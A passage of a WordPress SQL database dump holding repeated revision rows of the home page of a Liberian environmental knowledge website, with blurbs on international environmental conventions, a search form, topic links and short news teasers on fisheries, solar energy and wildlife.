16:25:44','',9,'https://ekmsliberia.info/?p=3931',0,'revision','',0),(3932,38,'2021-08-17 16:25:45','2021-08-17 16:25:45','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:25:45','2021-08-17 16:25:45','',9,'https://ekmsliberia.info/?p=3932',0,'revision','',0),(3933,38,'2021-08-17 16:26:45','2021-08-17 16:26:45','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:26:45','2021-08-17 16:26:45','',9,'https://ekmsliberia.info/?p=3933',0,'revision','',0),(3934,38,'2021-08-17 16:26:45','2021-08-17 16:26:45','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:26:45','2021-08-17 16:26:45','',9,'https://ekmsliberia.info/?p=3934',0,'revision','',0),(3935,38,'2021-08-17 16:26:46','2021-08-17 16:26:46','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue Fishermen Lost at Sea\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\">NaFAA Along With National Coast Guard Rescue Fishermen Lost at...</a></h4>National Fisheries and Aquaculture Authority(NaFAA) in collaboration with the Liberia&hellip;\n	<a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/libassa.png\" alt=\"EPA Technicians Carry Out Inventory on Animal Welfare at Libassa Wildlife Sanctuary in Marshall, Margibi County\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-technicians-carry-out-inventory-on-animal-welfare-at-libassa-wildlife-sanctuary-in-marshall-margibi-county/\">EPA Technicians Carry Out Inventory on Animal Welfare at Libassa...</a></h4>Technicians from the EPA headed by Hawa Walker, assistant manager&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2021-08-17 16:26:46','2021-08-17 16:26:46','',9,'https://ekmsliberia.info/?p=3935',0,'revision','',0),(3936,38,'2021-08-17 16:27:52','2021-08-17 16:27:52','Convention on Biological Diversity CBD is dedicated to promoting sustainable developmentRead MoreConvention on Climate ChangeThe ultimate objective of the Convention is to stabilize greenhouse gas concentrations \"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\"Read MoreConvention to Combat DesertificationA sole legally binding international agreement linking environment and development to sustainable land management.Read More				\n							Previous\n							Next\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\" target=\"\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"225\">Presentations</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n			<button>See all results</button>			\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fas fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/kehkeh.png\" alt=\"Liberia’s Grassroots Solar Energy Innovator\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/blog/\">Blog</a><h4><a href=\"https://ekmsliberia.info/liberias-grassroots-solar-energy-innovator/\">Liberia’s Grassroots Solar Energy Innovator</a></h4>Across the world, innovators from different sectors have invented devices,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/Untitled.png\" alt=\"NaFAA Fines Illegal Ivorian Fisherman US$5,000.00\" loading=\"lazy\" width=\"370\" height=\"192\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/nafaa-fines-illegal-ivorian-fisherman-us5000-00/\">NaFAA Fines Illegal Ivorian Fisherman US$5,000.00</a></h4>To deter illegal, unreported and unregulated (IUU) fishing across Liberia,&hellip;\n	<a href=\"https://ekmsliberia.info/nafaa-along-with-national-coast-guard-rescue-fishermen-lost-at-sea/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2021/07/nafaa.png\" alt=\"NaFAA Along With National Coast Guard Rescue 